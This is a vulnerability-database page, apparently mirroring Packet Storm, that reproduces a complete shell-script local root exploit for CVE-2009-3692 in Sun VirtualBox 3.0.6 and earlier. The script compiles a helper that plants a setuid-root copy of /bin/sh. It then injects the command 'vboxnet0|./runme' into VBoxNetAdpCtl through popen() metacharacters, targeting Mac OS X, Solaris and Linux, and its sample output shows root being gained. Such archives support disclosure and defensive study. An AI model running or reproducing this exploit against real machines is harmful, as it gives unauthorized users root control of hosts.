Lucene search
K

Sun VirtualBox 3.0.6 Local Root

🗓️ 17 Oct 2009 00:00:00Reported by prdelkaType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 31 Views

Sun VirtualBox 3.0.6 local root exploit using popen() meta char shell injection vulnerabilit

Related
Code
ReporterTitlePublishedViews
Family
0day.today
Sun VirtualBox <= 3.0.6 privilege escalation
17 Oct 200900:00
zdt
Circl
CVE-2009-3692
17 Oct 200900:00
circl
CVE
CVE-2009-3692
13 Oct 200910:00
cve
Cvelist
CVE-2009-3692
13 Oct 200910:00
cvelist
FreeBSD
virtualbox -- privilege escalation
7 Oct 200900:00
freebsd
Exploit DB
Sun VirtualBox 3.0.6 - Local Privilege Escalation
17 Oct 200900:00
exploitdb
EUVD
EUVD-2009-3667
7 Oct 202500:30
euvd
exploitpack
Sun VirtualBox 3.0.6 - Local Privilege Escalation
17 Oct 200900:00
exploitpack
Tenable Nessus
FreeBSD : virtualbox -- privilege escalation (ebeed063-b328-11de-b6a5-0030843d3802)
8 Oct 200900:00
nessus
Tenable Nessus
GLSA-201001-04 : VirtualBox: Multiple vulnerabilities
25 Feb 201000:00
nessus
Rows per page
`#!/bin/sh  
# CVE-2009-3692 Sun VirtualBox <= 3.0.6 local root exploit   
# ========================================================  
# Exploits popen() meta char shell injection vulnerability  
# in Sun VirtualBox.  
#   
# E.g.  
# admin@sundevil:~/test$ id  
# uid=101(admin) gid=10(staff) groups=10(staff)  
# admin@sundevil:~/test$ uname -a  
# SunOS sundevil 5.11 snv_111b i86pc i386 i86pc Solaris  
# admin@sundevil:~/test$ ./prdelka-vs-SUN-virtualbox.sh   
# [ Sun VirtualBox <= 3.0.6 OSX/SOL/LINUX local root exploit  
# [ No path provided, will attempt to exploit system default  
# [ Places a root shell in ./sh if succesful  
# [ Detected a SunOS target  
# [ Detected SunOS is x86 platform  
# ifconfig: add: bad address  
# [ Trying for root shell.  
# # id  
# uid=101(admin) gid=10(staff) euid=0(root) egid=0(root) groups=10(staff)  
#  
# -- prdelka   
cat >> runme.c << EOF  
#include <stdio.h>  
#include <stdlib.h>  
#include <unistd.h>  
#include <sys/types.h>  
#include <sys/stat.h>  
#include <fcntl.h>  
  
int main(int argc, char* argv[]){  
FILE *from, *to;  
int fd;  
char ch;  
setuid(0);  
setgid(0);  
from = fopen("/bin/sh","rb");  
to = fopen("./sh","wb");  
while(!feof(from)){  
ch = fgetc(from);  
if(!feof(from))  
fputc(ch, to);  
}  
fclose(from);  
fclose(to);  
fd = open("./sh",O_RDWR);  
fchown(fd,0,0);  
fchmod(fd,S_IRWXU|S_IRWXG|S_IRWXO|S_ISUID|S_ISGID);  
close(fd);   
exit(0);  
}  
EOF  
gcc runme.c -o runme 2>/dev/null  
rm -rf runme.c  
cat >> exploit.c << EOF  
/*  
CVE-2009-3692 VirtualBox VBoxNetAdpCtl Privilege Escalation  
===========================================================  
Local exploit for the popen() meta character shell injection  
vulnerability that permits a malicious user to obtain root  
privileges on the VirtualBox host machine. This exploit relies  
on the "/bin/sh" binary on the host as being a non-privilege  
dropping shell such as zsh, this is not always the OS default  
setting.  
  
Most modern platforms do not have a /bin/sh that retains   
privileges by default however Solaris still seems to!  
  
You can provide an arguement to the VBoxNetAdpCtl binary   
path or alternatively this exploit detects local host platform  
and runs with common or default installation location.  
*/  
#include <stdio.h>  
#include <stdlib.h>  
#include <sys/utsname.h>  
  
int main(int argc,char* argv[])  
{  
char *env[] = {NULL};  
int platform, machine = 0;  
struct utsname* sysdetail = malloc(sizeof(struct utsname));  
printf("[ Sun VirtualBox <= 3.0.6 OSX/SOL/LINUX local root exploit\n");  
if(argc > 1){  
printf("[ Trying %s\n", argv[1]);  
execle(argv[1],argv[1],"vboxnet0|./runme","1::2",NULL,env);  
exit(0);  
}  
else{  
printf("[ No path provided, will attempt to exploit system default\n");  
}  
printf("[ Places a root shell in ./sh if succesful\n");  
uname(sysdetail);  
if(!strncmp("Darwin",sysdetail->sysname,strlen("Darwin")))  
platform = 1;  
if(!strncmp("SunOS",sysdetail->sysname,strlen("SunOS")))   
platform = 2;   
if(!strncmp("Linux",sysdetail->sysname,strlen("Linux")))   
platform = 3;  
switch(platform){  
case 1:  
printf("[ Detected a Mac OS X target\n");  
execle("/Applications/VirtualBox.app/Contents/MacOS/VBoxNetAdpCtl","VBoxNetAdpCtl","vboxnet0|./runme","1::2",NULL,env);  
break;  
case 2:  
printf("[ Detected a SunOS target\n");  
if(!strncmp("i86pc",sysdetail->machine,strlen("i86pc"))){  
printf("[ Detected SunOS is x86 platform\n");  
execle("/opt/VirtualBox/i386/VBoxNetAdpCtl","VBoxNetAdpCtl","vboxnet0|./runme","1::2",NULL,env);  
}  
else{  
printf("[ Guessing SunOS is amd64 platform\n");  
execle("/opt/VirtualBox/amd64/VBoxNetAdpCtl","VBoxNetAdpCtl","vboxnet0|./runme","1::2",NULL,env);  
}  
break;  
case 3:  
printf("[ Detected a Linux target\n");  
execle("/opt/VirtualBox/VBoxNetAdpCtl","VBoxNetAdpCtl","vboxnet0|./runme","1::2",NULL,env);  
break;  
default:  
printf("[ Unknown OSE target. Try ./%s <path>/VBoxNetAdpCtl\n",argv[0]);  
break;  
}  
exit(0);  
}  
EOF  
gcc exploit.c -o exploit 2>/dev/null  
rm -rf exploit.c  
if [ $1 ]  
then  
./exploit $1  
else  
./exploit  
fi  
echo [ Trying for root shell.  
./sh  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation